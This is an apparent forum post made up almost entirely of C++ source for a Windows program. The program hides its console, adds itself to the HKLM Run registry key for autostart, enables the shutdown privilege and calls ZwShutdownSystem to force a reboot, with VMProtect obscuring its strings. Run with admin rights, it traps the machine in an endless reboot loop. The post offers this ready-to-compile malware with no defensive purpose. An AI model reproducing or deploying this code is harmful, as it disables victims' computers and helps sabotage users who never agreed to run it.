[C++] 纯文本查看 复制代码
// Project20.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include "pch.h"
#include <iostream>
#include <Windows.h>
#include <stdio.h>
#include <strsafe.h>
#include <string.h>
#include <Aclapi.h>
#include "VMProtectSDK.h"
#pragma comment(lib, "Advapi32.lib")
#pragma comment(lib, "User32.lib")
typedef long(__fastcall *pfnRtlAdjustPrivilege64)(ULONG, ULONG, ULONG, PVOID);
typedef int(*pfnZwShutdownSystem)(int);
pfnRtlAdjustPrivilege64 RtlAdjustPrivilege = NULL;
pfnZwShutdownSystem ZwShutdownSystem = NULL;
BOOL HandleReg()
{
VMProtectBegin("vmp");
LPCWSTR pommandLine = NULL;
WCHAR strPathBuffer[MAX_PATH] = { 0 };
int nLen = 0;
PCHAR pMultiString = NULL;
//取当前目录
GetCurrentDirectory(MAX_PATH, strPathBuffer);
StringCchCat(strPathBuffer, MAX_PATH, VMProtectDecryptStringW(L"\\"));
pommandLine = GetCommandLine();
nLen = WideCharToMultiByte(CP_OEMCP, 0, pommandLine, lstrlen(pommandLine), NULL, 0, NULL, NULL);
pMultiString = new CHAR[nLen + 1];
if (pMultiString == NULL)
return FALSE;
RtlZeroMemory(pMultiString, nLen + 1);
WideCharToMultiByte(CP_OEMCP, 0, pommandLine, lstrlen(pommandLine), pMultiString, nLen + 1, NULL, NULL);
char *q = strstr(pMultiString, VMProtectDecryptStringA("\\"));
char *temp = NULL;
char buffer[MAX_PATH] = { 0 };
WCHAR strBuffer[MAX_PATH] = { 0 };
while (1)
{
if (q == NULL)
break;
q++;
temp = q;
q = strstr(q, VMProtectDecryptStringA("\\"));
}
StringCchCopyA(buffer, strlen(temp) - 1, temp);
MultiByteToWideChar(CP_OEMCP, 0, buffer, MAX_PATH, strBuffer, MAX_PATH);
StringCchCat(strPathBuffer, MAX_PATH, strBuffer);
HKEY hKey = NULL;
LPCWSTR strSubKeyData = VMProtectDecryptStringW(L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
//打开注册表
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, strSubKeyData, 0, KEY_QUERY_VALUE | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS)
return FALSE;
//设置键值项
if (RegSetKeyValue(hKey, NULL, VMProtectDecryptStringW(L"LookAtTheWind"), REG_SZ, strPathBuffer, sizeof(strPathBuffer)) != ERROR_SUCCESS)
return FALSE;
delete[]pMultiString;
pMultiString = NULL;
RegCloseKey(hKey);
hKey = NULL;
return TRUE;
VMProtectEnd();
}
int main()
{
VMProtectBegin("vmp");
ShowWindow(FindWindow(VMProtectDecryptStringW(L"ConsoleWindowClass"), NULL), SW_HIDE);
HandleReg();
HMODULE hModule = ::LoadLibrary(VMProtectDecryptStringW(L"ntdll.dll"));
if (hModule == NULL)
return 0;
RtlAdjustPrivilege = (pfnRtlAdjustPrivilege64)GetProcAddress(hModule, VMProtectDecryptStringA("RtlAdjustPrivilege"));
if (RtlAdjustPrivilege == NULL)
return 0;
ZwShutdownSystem = (pfnZwShutdownSystem)GetProcAddress(hModule, VMProtectDecryptStringA("ZwShutdownSystem"));
if (ZwShutdownSystem == NULL)
return 0;
//取得系统版本
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (GetVersionExW(&osvi) == 0)
return 0;
DWORD dwReturnval;
if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT) {
/*
.常量 SE_BACKUP_PRIVILEGE, "17", 公开
.常量 SE_RESTORE_PRIVILEGE, "18", 公开
.常量 SE_SHUTDOWN_PRIVILEGE, "19", 公开
.常量 SE_DEBUG_PRIVILEGE, "20", 公开
*/
RtlAdjustPrivilege(19, TRUE, 0, &dwReturnval);
}
ZwShutdownSystem(1); //0:关机 1:重启 2:睡眠
FreeLibrary(hModule);
hModule = NULL;
system(VMProtectDecryptStringA("pause"));
return 0;
VMProtectEnd();
}
发表于 2020-7-10 19:11
|
发表于 2020-7-10 20:46
